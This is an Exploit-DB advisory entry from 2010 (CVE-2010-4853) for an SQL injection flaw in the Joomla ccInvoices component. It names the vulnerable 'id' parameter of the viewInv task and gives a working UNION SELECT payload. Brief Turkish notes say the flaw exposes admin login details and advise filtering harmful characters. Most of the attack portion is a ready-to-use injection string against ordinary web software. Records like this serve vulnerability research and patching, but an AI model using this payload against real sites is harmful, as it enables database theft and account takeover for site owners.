Joomla ccInvoices Component com_ccinvoices SQL Injection Vulnerability

2010-11-05T00:00:00
ID EDB-ID:15430
Type exploitdb
Reporter FL0RiX
Modified 2010-11-05T00:00:00

Description

Joomla ccInvoices Component (com_ccinvoices) SQL Injection Vulnerability. CVE-2010-4853. Webapps exploit for php platform

                                        
                                            <------------------- header data start ------------------- >
#############################################################
Joomla Component ccinvoices SQL Injection Vulnerability                                      
#############################################################

# Author        : Fl0riX ~ Bug Researchers

# Name : Joomla com_ccinvoices

# Bug Type : SQL injection

# Infection : Admin Login Bilgileri Alinabilir.

# Vendor: http://www.chillcreations.com/

# Demo Vuln :
[+]index.php?option=com_ccinvoices&task=viewInv&id=[EXPLOIT]

# Note: register in site & Login with ur account.

# Bug Fix Advice : Zararli Karakterler Filtrenmelidir.
#############################################################
< ------------------- header data end of ------------------- >
< -- bug code start -- >
EXPLOIT :
null+and+1=0+union+select+1,2,3,4,5,6,7,8,version(),10,11,12,13,14,15,16,17,18,19,20,21,22,23,24
< -- bug code end of -- >